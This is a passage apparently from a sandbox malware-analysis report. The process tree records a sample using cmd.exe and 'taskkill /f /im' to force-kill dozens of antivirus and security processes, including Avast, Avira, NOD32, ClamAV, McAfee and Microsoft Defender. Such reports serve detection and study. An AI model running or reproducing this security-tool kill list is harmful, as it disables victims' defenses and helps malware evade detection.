- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ccsetmgr.exe >nul
  2⤵
  PID:776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccsetmgr.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ccevtmgr.exe >nul
  2⤵
  PID:1348
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ccevtmgr.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashwebsv.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashwebsv.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashwebsv.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashwebsv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashdisp.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2376
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashdisp.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashmaisv.exe >nul
  2⤵
  PID:992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashmaisv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashserv.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2436
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashserv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im aswUpdSv.exe >nul
  2⤵
  PID:2832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im aswUpdSv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im ashwebsv.exe >nul
  2⤵
  PID:2416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ashwebsv.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avadmin.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3036
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avadmin.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avcenter.exe >nul
  2⤵
  PID:2740
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avcenter.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgnt.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2808
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgnt.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avguard.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avguard.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avnotify.exe >nul
  2⤵
  PID:2848
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avnotify.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avscan.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avscan.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im guardgui.exe >nul
  2⤵
  PID:2976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im guardgui.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im nod32krn.exe >nul
  2⤵
  PID:3000
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nod32krn.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im nod32kui.exe >nul
  2⤵
  PID:332
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im nod32kui.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im clamscan.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:652
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im clamscan.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im clamTray.exe >nul
  2⤵
  PID:792
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im clamTray.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im clamWin.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im clamWin.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im freshclam.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2032
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im freshclam.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im oladdin.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2336
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im oladdin.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im sigtool.exe >nul
  2⤵
  PID:1320
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sigtool.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im w9xpopen.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im w9xpopen.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im Wclose.exe >nul
  2⤵
  PID:1696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Wclose.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im cmgrdian.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im cmgrdian.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im oladdin.exe >nul
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im oladdin.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im alogserv.exe >nul
  2⤵
  PID:2256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im alogserv.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im mcshield.exe >nul
  2⤵
  PID:2104
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im mcshield.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im vshwin32.exe >nul
  2⤵
  PID:3044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vshwin32.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avconsol.exe >nul
  2⤵
  PID:1296
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avconsol.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im vsstat.exe >nul
  2⤵
  PID:2040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vsstat.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im vsstat.exe >nul
  2⤵
  PID:1512
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im vsstat.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avsynmgr.exe >nul
  2⤵
  PID:444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avsynmgr.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avcenter.exe >nul
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avcenter.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avcmd.exe >nul
  2⤵
  PID:2400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avcmd.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avconfig.exe >nul
  2⤵
  PID:1356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avconfig.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avguard.exe >nul
  2⤵
  PID:276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avguard.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avgnt.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:908
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avgnt.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avnotify.exe >nul
  2⤵
  PID:2516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avnotify.exe
    3⤵
    - Kills process with taskkill
    PID:2636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im avscan.exe >nul
  2⤵
  PID:2352
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im avscan.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:2196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im guardgui.exe >nul
  2⤵
  PID:2388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im guardgui.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im licmgr.exe >nul
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im licmgr.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:2312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im sched.exe >nul
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sched.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im preupd.exe >nul
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2440
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im preupd.exe
    3⤵
    - Kills process with taskkill
    PID:2468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im MsMpEng.exe >nul
  2⤵
  PID:1608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im MsMpEng.exe
    3⤵
    - Kills process with taskkill
    PID:3064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c @taskkill /f /im MSASCui.exe >nul
  2⤵
  PID:2680
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im MSASCui.exe
    3⤵
    - Kills process with taskkill
    PID:2736